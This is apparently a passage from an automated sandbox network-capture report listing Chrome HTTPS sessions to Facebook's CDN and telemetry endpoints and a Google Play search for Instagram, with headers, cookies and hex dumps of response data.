                                                                                                                                                                                                                                  Data Ascii: illSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["JSErrorLoggingConfig",[],{"appId":256281040558,"extra":[],"reportInterval":50,"sampleWeight":null,"sampleWeightKey":"__jssesw","projectBlocklist":[]},2776],["DataStoreConfig",[],
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 37 33 38 36 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 33 39 30 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 30 33 32 36 37 22 2c 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c
                                                                                                                                                                                                                                  Data Ascii: 7386",["clearTimeoutWWW"],{"__rc":["clearTimeoutWWW",null]},-1],["cr:7390",["setTimeoutWWW"],{"__rc":["setTimeoutWWW",null]},-1],["cr:1003267",["clearIntervalBlue"],{"__rc":["clearIntervalBlue",null]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC1500INData Raw: 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 77 65 6c 63 6f 6d 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 6e 75 78 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c
                                                                                                                                                                                                                                  Data Ascii: o\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle\/nux\/":1,"\/zero\/toggle\


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  95192.168.2.649822157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:26 UTC375OUTGET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:27 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ZFLtdcU+Go6QpmTfGJWakA==
                                                                                                                                                                                                                                  Expires: Thu, 18 Sep 2025 16:10:20 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: Ra1mru2Mhi/0txUabKLJ1IQFbC0icc/rFc4GHoAyvbjYPxFNeLQD/Onjc78fEwuO7kULSwieAIsIhMh3uWZyNg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:26 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2106
                                                                                                                                                                                                                                  2024-09-29 04:53:27 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:27 UTC2102INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 01 59 50 4c 54 45 47 70 4c 05 65 ff 08 65 ff 07 65 ff 10 70 ff 07 65 ff 08 66 ff 08 66 ff 08 68 ff 08 66 ff 07 66 ff 00 60 ff 10 60 ff ff ff ff 08 67 ff 07 66 ff 08 66 ff 08 67 ff 08 67 ff 08 66 ff 08 66 ff 08 66 ff 08 67 ff 07 66 ff 08 68 ff 09 65 ff 08 66 ff 08 64 ff 09 67 ff 07 65 ff 07 65 ff 06 63 ff 0a 66 ff 07 66 ff 08 65 ff 07 66 ff 09 67 ff 06 67 ff 08 65 ff 08 66 ff 08 66 ff ff ff ff ff ff ff 08 69 ff 08 68 ff 07 65 ff 09 66 ff 07 66 ff ff ff ff 0b 65 ff ff ff ff ff ff ff 07 65 ff 07 67 ff 07 66 ff 07 66 ff 0a 66 ff 09 66 ff 07 66 ff 09 66 ff 07 67 ff ff ff ff ff ff ff 06 66 ff 08 65 ff 07 65 ff ff ff ff 87 b7 ff 46 8c ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: PNGIHDRe5YPLTEGpLeeepeffhff``gffggfffgfhefdgeecffefggeffiheffeegffffffgfeeF
                                                                                                                                                                                                                                  2024-09-29 04:53:27 UTC3INData Raw: 42 60 82
                                                                                                                                                                                                                                  Data Ascii: B`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  96192.168.2.649868157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:35 UTC1197OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=4&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 1697
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvu0cPljffYL9eKXw
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:35 UTC1697OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 76 75 30 63 50 6c 6a 66 66 59 4c 39 65 4b 58 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 31 33 34 32 37 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 76 75 30 63 50 6c 6a 66 66 59 4c 39 65 4b 58 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 74 73 22 3a 22 6e 68 43 41 57 31 73 69 5a 6d 46 73 59 32 38 36 62 32 52 7a 58 33 64 6c 59 6c 39 69 59 58 52 6a
                                                                                                                                                                                                                                  Data Ascii: ------WebKitFormBoundaryvu0cPljffYL9eKXwContent-Disposition: form-data; name="ts"1727585613427------WebKitFormBoundaryvu0cPljffYL9eKXwContent-Disposition: form-data; name="q"[{"app_id":"256281040558","posts":"nhCAW1siZmFsY286b2RzX3dlYl9iYXRj
                                                                                                                                                                                                                                  2024-09-29 04:53:35 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923718316045770", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923718316045770"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:35 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:35 UTC1948INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  97192.168.2.649893157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:36 UTC870OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=4&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:36 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923722841760019", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923722841760019"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:36 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:36 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  98192.168.2.649933142.250.181.2384431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:42 UTC814OUTGET /store/search?q=instagram&c=apps&hl=ru&gl=US HTTP/1.1
                                                                                                                                                                                                                                  Host: play.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:43 UTC4049INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  x-ua-compatible: IE=edge
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:43 GMT
                                                                                                                                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-TE7yCrXo5wQ3m4_lNbxAdQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/PlayStoreUi/cspreport;worker-src 'self'
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://market.android.com https://clients2.google.com https://payments.sandbox.google.com https://payments.google.com https://maps.googleapis.com https://translate.googleapis.com https://translate.google.com https://support.google.com https://www.gstatic.cn https://families.google.com https://clients1.google.com https://myaccount.google.com https://accounts.google.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.googleapis.com/appsmarket/v2/installedApps/;report-uri /_/PlayStoreUi/cspreport/allowlist
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.google.com/js/bg/ https://www.gstatic.com/_/boq-play/_/js/k=boq [TRUNCATED]
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                  reporting-endpoints: default="/_/PlayStoreUi/web-reports?context=eJzjytDikmII1JBikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgXhJxkfVA4kVWQ4VLrPZArNpzidUYiIskrrA2APGprnusF4DYuuceqyMQ_158j5VxyT1W8VX3WGWBWIib4_qux9vZBBYceiqkJJ-UXxhfkJNYWZpZnFpUlloUb2RgZGJgaWSqZ2gQX2AAAEycPGE"
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Set-Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg; expires=Mon, 31-Mar-2025 04:53:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
